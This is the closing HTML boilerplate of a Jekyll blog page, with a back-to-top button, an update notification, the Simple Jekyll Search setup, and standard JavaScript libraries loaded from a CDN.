    <a id="back-to-top" href="#" aria-label="back-to-top" class="btn btn-lg btn-box-shadow" role="button">
      <i class="fas fa-angle-up"></i>
    </a>

    
      <div id="notification" class="toast" role="alert" aria-live="assertive" aria-atomic="true"
        data-animation="true" data-autohide="false">
        <div class="toast-header">
          <button type="button" class="ml-2 ml-auto close" data-dismiss="toast" aria-label="Close">
            <span aria-hidden="true">&times;</span>
          </button>
        </div>
        <div class="toast-body text-center pt-0">
          <p class="pl-2 pr-2 mb-3">A new version of content is available.</p>
          <button type="button" class="btn btn-primary" aria-label="Update">
            Update
          </button>
        </div>
      </div>
    

    <!--
  Jekyll Simple Search loader
  See: <https://github.com/christian-fei/Simple-Jekyll-Search>
-->





<script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js"></script>

<script>
SimpleJekyllSearch({
  searchInput: document.getElementById('search-input'),
  resultsContainer: document.getElementById('search-results'),
  json: '/Blog/assets/js/data/search.json',
  searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0">  <a href="{url}">{title}</a>  <div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1">    {categories}    {tags}  </div>  <p>{snippet}</p></div>',
  noResultsText: '<p class="mt-5">Oops! No results found.</p>',
  templateMiddleware: function(prop, value, template) {
    if (prop === 'categories') {
      if (value === '') {
        return `${value}`;
      } else {
        return `<div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`;
      }
    }

    if (prop === 'tags') {
      if (value === '') {
        return `${value}`;
      } else {
        return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`;
      }
    }
  }
});
</script>


    <!--
  JS selector for site.
-->

<!-- layout specified -->


  



  <!-- image lazy-loading & popup & clipboard -->
  

  







  
    

    

  



  
    

    

  



  
    

    

  




  <script src="https://cdn.jsdelivr.net/combine/npm/magnific-popup@1/dist/jquery.magnific-popup.min.js,npm/lozad/dist/lozad.min.js,npm/clipboard@2/dist/clipboard.min.js"></script>







  

  

  







  
    

    

  



  
    

    

  



  
    

    

  



  
    

    

  




  <script src="https://cdn.jsdelivr.net/combine/npm/dayjs@1/dayjs.min.js,npm/dayjs@1/locale/en.min.js,npm/dayjs@1/plugin/relativeTime.min.js,npm/dayjs@1/plugin/localizedFormat.min.js"></script>








<script defer src="/Blog/assets/js/dist/post.min.js"></script>



<!-- commons -->

<script src="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/js/bootstrap.bundle.min.js"></script>




  </body>

</html>

